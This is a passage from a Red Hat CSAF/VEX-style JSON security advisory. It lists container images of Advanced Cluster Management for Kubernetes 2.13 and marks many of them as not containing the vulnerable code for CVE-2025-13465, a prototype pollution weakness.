"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-13465",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"discovery_date": "2026-01-21T20:01:28.774829+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
